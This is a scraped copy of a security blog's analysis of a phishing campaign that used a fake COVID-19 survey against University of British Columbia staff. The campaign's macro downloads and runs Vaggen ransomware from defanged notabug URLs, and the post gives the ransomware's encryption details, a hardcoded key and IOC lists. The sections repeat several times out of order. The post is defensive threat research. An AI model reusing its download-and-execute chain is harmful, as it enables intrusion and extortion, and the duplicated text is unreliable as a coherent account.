from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 619 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 620 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 621 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 622 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 623 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 624 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 625 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nThis post was authored by Jérôme Segura with contributions from Hossein Jazi, Hasherezade and Marcelo Rivero.\r\nIn recent weeks, we’ve observed a number of phishing attacks against universities worldwide which we attributed\r\nto the Silent Librarian APT group. On October 19, we identified a new phishing document targeting staff at the\r\nUniversity of British Columbia (UBC) with a fake COVID-19 survey.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 626 of 3467\n\nHowever, this attack and motives are different than the ones previously documented. The survey is a malicious\r\nWord document whose purpose is to download ransomware and extort victims to recover their encrypted files.\r\nOn discovery, we got in touch with UBC to report our findings. They were already aware of this phishing\r\ncampaign and were kind enough to share more information with us about the incident. Ultimately, this attack was\r\nnot successful due to the rapid response of the UBC cybersecurity team.\r\nMandatory COVID-19 survey distributed to targeted recipients\r\nThe attacker created an email address with the mailpoof.com service in order to register accounts with Box.net\r\nand DropBox. Rather than directly sending the fake survey via email, the attacker uploaded the document onto\r\nBox and DropBox and used the share functionality from these platforms to distribute it.\r\nThis was probably done to evade spam and phishing filters that would have blocked messages coming from a\r\nnewly registered email address with a low reputation. In comparison, it is much more difficult to detect spam from\r\nfile sharing services without creating a number of false positives.\r\nThe attacker claimed to be a manager and added the following comment in the file sharing invitation (shared with\r\nus by UBC):\r\nGood evening gals and guys! [redacted] here, [redacted] manager for [redacted]. I am sharing a\r\nmandatory survey with you that must be completed by Monday. It asks a few questions about how you\r\nbelieve our company responded to the pandemic regarding remote working and much more. Please fill\r\nit out ASAP!\r\nYou will also find a form at the end that you can fill out if you need any necessities! Necessities\r\ninclude: gloves, hand sanitizer, masks, or disinfectant spray. We will be providing it to those employees\r\nwho fill out the form for free! Simply sign your initials and put what you need as well as the quantity!\r\nIn advance, we appreciate your feedback! Thanks all! Stay strong! I understand times like this can be\r\ndifficult!\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 627 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 628 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 629 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 630 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 631 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 632 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 633 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 634 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 635 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 636 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 637 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 638 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 639 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 640 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 641 of 3467\n\npolisen.exe\r\n03420a335457e352e614dd511f8b03a7a8af600ca67970549d4f27543a151bcf\r\nkillar.exe\r\n43c222eea7f1e367757e587b13bf17019f29bd61c07d20cbee14c4d66d43a71f\r\nVariant3:\r\ntemplate1.dotm\r\n225e19abba17f70df00562e89a5d4ad5e3818e40fd4241120a352aba344074f4\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/irving.exe\r\nnotabug[.]org/Microsoft-Templates/Template/raw/master/alderson.exe\r\ncanarytokens[.]com/images/tags/8pkmk2o11dmp1xjv5i9svji32/contact.php\r\ncanarytokens[.]com/articles/traffic/5ayx8tydzeuzhmq6y5u2lxhpa/post.jsp\r\nVariant4:\r\nsmoothtemplates.dotm\r\nada43ee41f70e327944121217473c536024cd9c90e25088a1a6c5cf895f59fe1\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\nb4a1a0012abde1ae68f50fa1fe53df7a5d933ec5410731622ab0ad505915cfb6\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant5:\r\ntemplate.dotm:\r\n7ad8a3c438f36cdfc5928e9f3c7c052463b5987055f583ff716d0382d0eb23b4\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrclean.exe\r\nnotabug[.]org/Microsoft-Office/Office-Templates/raw/master/mrmonster.exe\r\ncanarytokens[.]com/images/feedback/tags/0xu6dnwmpc1k1j2i3nec3fq2b/post.jsp\r\ncanarytokens[.]com/traffic/about/images/ff6x6licr69lmjva84rn65hao/contact.php\r\nmrmonster.exe\r\nf42bbb178e86dc3449662b5fe4c331e3489de01277f00a56add12501bf8e6c23\r\nmrclean.exe\r\n71aadf3c1744f919cddcc157ff5247b1af2e2211b567e1eee2769973b2f7332a\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 642 of 3467\n\nAccording to UBC, less than a hundred people within a specific department received the link to access the shared\r\ndocument. A Box or Dropbox account was required in order to download the file since it was shared privately,\r\ninstead of publicly. This may have been an effort to evade detection or perhaps the attacker expected the target\r\norganization to already be using one of these two sharing services.\r\nPhishing document analysis\r\nThe phishing document uses template injection to download and execute a remote template (template.dotm)\r\nweaponized with a malicious macro. That file was uploaded to a free code hosting website (notabug.org).\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 643 of 3467\n\nWhen the macro is executed, it does the following:\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 644 of 3467\n\nGets the %APPDATA% directory\r\nCreates the Byxor directory in %APPDATA%\r\nDownloads a file from the following url and writes it as Polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nDownloads a file from the following url and writes it as Killar.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\nCalls shell function to execute killar.exe\r\nChecks the output of shell function and whether it was successful (return value would be task Id of\r\nexecuted application)\r\nIf successful, it sends a GET http request to:\r\ncanarytokens.com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\nIf it isn’t successful, it sends a GET http request to:\r\ncanarytokens.com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nWe were able to identify four other variants of the remote templates and payloads. In some of the folders, we\r\nfound several artifacts using Swedish words, which could indicate that the threat actor is familiar with the\r\nlanguage.\r\nOpening the phishing document will trigger a notification via the canarytokens.com website. Typically, people use\r\nthis type of service to get alerted for a particular event.\r\nThis can be very useful as an early warning notification system that an intruder has had access to a network. In\r\nthis case, the attacker is probably interested in how many people opened the document and perhaps where they are\r\nfrom.\r\nVaggen ransomware\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 645 of 3467\n\nAfter being deployed, the ransomware starts encrypting the user’s files and adding the .VAGGEN extension to\r\nthem. When the encryption process is finished, it drops a ransom note on the Desktop, demanding a payment\r\nequivalent to 80 USD to be paid in Bitcoin.\r\nThe ransomware appears to be coded from scratch and is a relatively straightforward application written in Go\r\nwhich starts with the function denoted as ‘main_main’.\r\nOther functions belonging to the main application have obfuscated names, such as: main_FOLOJVAG,\r\nmain_DUVETVAD, main_ELDBJORT, main_HIDDENBERRIES, main_LAMNARDETTA, main_SPRINGA.\r\nmain_LAMNARDETTA -\u003e main_enumDir main_ELDBJORT -\u003e main_encryptFile main_SPRINGA -\u003e main_encryptAndRen\r\nA full list of the functions, along with their RVAs can be found here.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 646 of 3467\n\nSome of the strings used by the malware (i.e. the content of the ransom note) are encrypted with the help of\r\nXXTEA (using library: xxtea-go). Encrypted chunks are first decoded from Base64. The XXTEA key is\r\nhardcoded (“STALKER”). At the end of the execution, the ransom note is dropped on the Desktop.\r\nEncrypting and renaming of the files is deployed as the callback of the standard Golang function:\r\npath.filepath.Walk.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 647 of 3467\n\nFiles are encrypted with AES-256 (32 byte long key) in GCM mode.\r\nThe encryption algorithm is similar to the one demonstrated here. Using a hardcoded key and 12 bytes long nonce,\r\ngenerated by CryptGenRandom. The file content is encrypted with the help of the gcm.Seal function.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 648 of 3467\n\nThe content of the output file (with .VAGGEN extension) contains:\r\nthe 12 bytes long nonce\r\nthe encrypted content\r\nthe 16 byte long GCM Tag\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 649 of 3467\n\nThe hardcoded key “du_tar_mitt_hjart_mina_pengarna0” found inside the malware code is Swedish for “you take\r\nmy heart my money”. Using this key, we can easily decrypt the content.\r\nWith all these elements, we can actually recover encrypted files without having to pay the ransom. It appears that\r\nthe malware author has not received any payment so far at this Bitcoin address.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 650 of 3467\n\nUnusually low ransom amount\r\nBased on our findings, we believe this is not a sophisticated threat actor, nor affiliated with any of the big\r\nransomware gangs such as Ryuk. The ransom amount is unusually low, and unlike professional ransomware, this\r\nattack can be recovered from fairly easy.\r\nHowever, the phishing attack was well conceived and the template looks well designed, with a nice touch of\r\nadding canary tokens. It’s unclear at this point if the University of British Columbia was the sole target or not.\r\nCrawling additional repositories created by the threat actor, we found other Word template files that have used a\r\nvery similar macro to drop a coin miner. This casts more questions about the motivation behind this phishing\r\nattack.\r\nWe are grateful for the information shared with us by the University of British Columbia. This allowed us to paint\r\na better picture of this attack and understand who the targets were.\r\nMalwarebytes customers were already protected thanks to our signature-less Anti-Exploit layer.\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 651 of 3467\n\nIOCs\r\nVariant1:\r\nsummerofficetemplate.dotm\r\n634264996c0d27b71a5b63fb87042e29660de7ae8f18fcc27b97ab86cb92b6d4\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/irving.exe\r\nnotabug[.]org/arstidar/VARLDVINNA/raw/master/alderson.exe\r\ncanarytokens[.]com/traffic/jnk5rpagi54vztro6tau6g1v6/index.html\r\ncanarytokens[.]com/traffic/articles/tags/z8yobwprmmopmyfyw8sb1fb0a/index.html\r\nalderson.exe\r\n34842eff9870ea15ce3b3f3ec8d80c6fd6a22f65b6bae187d8eca014f11aafa5\r\nirving.exe\r\n00c60593dfdc9bbb8b345404586dcf7197c06c7a92dad72dde2808c8cc66c6fe\r\nVariant2:\r\nUBC-COVID19-Survey-Mandatory.docx\r\ne869e306c532aaf348725d94c1d5da656228d316071dede76be8fcd7384391c3\r\ntemplate.dotm\r\n334531228a447e4dfd427b08db228c62369461bb2ccde9ab1315649efd0316b1\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/polisen.exe\r\nnotabug[.]org/Microsoft-Office/Word-Templates/raw/master/lamnarmighar/killar.exe\r\ncanarytokens[.]com/about/d4yeyvldfg6bn5y29by4e9fs3/post.jsp\r\ncanarytokens[.]com/articles/6dbbnd503z06qitej1sdzzcvv/index.html\r\nhttps://blog.malwarebytes.com/cybercrime/2020/10/fake-covid-19-survey-hides-ransomware-in-canadian-university-attack/\r\nPage 652 of 